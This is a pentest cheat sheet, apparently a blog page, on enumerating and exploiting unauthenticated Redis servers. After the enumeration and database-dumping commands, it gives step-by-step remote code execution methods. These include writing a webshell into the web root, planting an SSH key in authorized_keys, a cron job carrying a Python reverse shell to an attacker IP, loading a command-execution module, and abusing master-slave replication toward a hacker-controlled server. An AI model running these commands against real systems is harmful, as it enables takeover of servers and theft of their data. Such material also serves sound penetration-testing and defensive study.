Port Enumeration – 6379/REDIS

Enumeration using nmap

nmap:
nmap --script redis-info -sV -p 6379

Manual enumeration
netcat and redis-cli:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

output: you might get information or -NOAUTH Authentication required.

By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password.

If only password is configured the username used is “default”.

Also, note that there is no way to find externally if Redis was configured with only password or username+password.

AUTH

To Check it creds are valid:

Valid credentials will be responded with: +OK

Authenticated enumeration

redis-cli:

INFO
[ … Redis response with info … ]
client list
[ … Redis response with connected clients … ]
CONFIG GET *
[ … Get config … ]

For other redis commands: https://redis.io/topics/data-types-intro, https://lzone.de/cheat-sheet/Redis

Dumping Database

redis-cli:

Inside Redis the databases are numbers starting from 0. You can find if anyone is used in the output of the command info inside the “Keyspace” chunk:

SELECT 1
[ … Indicate the database … ]
KEYS *
[ … Get Keys … ]
GET
[ … Get Key … ]

Dump the database with npm redis-dump(https://www.npmjs.com/package/redis-dump) or python redis-utils(https://pypi.org/project/redis-utils/)****

Redis RCE – webshell

redis-cli:

From: http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html

You must know the path of the Web site folder
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK

config set dbfilename redis.php
OK
set test ""
OK
save
OK

If the webshell access exception, you can empty the database after backup and try again, remember to restore the database.

Redis RCE – ssh

redis-cli:

Please be aware config get dir result can be changed after other manually exploit commands.

Suggest to run it first right after login into Redis.

In the output of config get dir you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis.

If you know the home of other valid user where you have writable permissions you can also abuse it:

  1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
  2. Write the public key to a file : (echo -e “\n\n”; cat ~/id_rsa.pub; echo -e “\n\n”) > spaced_key.txt
  3. Import the file into redis : cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
  4. Save the public key to the authorized_keys file on redis server:
    root@Urahara:~# redis-cli -h 10.85.0.52
    10.85.0.52:6379> config set dir /var/lib/redis/.ssh
    OK
    10.85.0.52:6379> config set dbfilename “authorized_keys”
    OK
    10.85.0.52:6379> save
    OK
  5. Finally, you can ssh to the redis server with private key : ssh -i id_rsa redis@10.85.0.52

Redis RCE – crontab

redis-cli:
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

The last example is for Ubuntu, for Centos, the above command should be:

    redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

Redis RCE – load redis module

  1. Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a redis module to execute arbitrary commands.
  2. Then you need some way to upload the compiled module
  3. Load the uploaded module at runtime with MODULE LOAD /path/to/mymodule.so
  4. List loaded modules to check it was correctly loaded: MODULE LIST
  5. Execute commands:
    127.0.0.1:6379> system.exec “id”
    “uid=0(root) gid=0(root) groups=0(root)\n”
    127.0.0.1:6379> system.exec “whoami”
    “root\n”
    127.0.0.1:6379> system.rev 127.0.0.1 9999
  6. Unload the module whenever you want: MODULE UNLOAD mymodule

LUA sandbox bypass

Check hacktricks for more info

Master-Slave replication Module

The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.

    master redis : 10.85.0.51 (Hacker's Server)
    slave  redis : 10.85.0.52 (Target Vulnerability Server)
    A master-slave connection will be established from the slave redis and the master redis:
    redis-cli -h 10.85.0.52 -p 6379
    slaveof 10.85.0.51 6379
    Then you can login to the master redis to control the slave redis:
    redis-cli -h 10.85.0.51 -p 6379
    set mykey hello
    set mykey2 helloworld

For Gitlab ssrf to redis rce, check hacktricks.

Total
0
Shares
Share 0
Tweet 0
Pin it 0
Share 0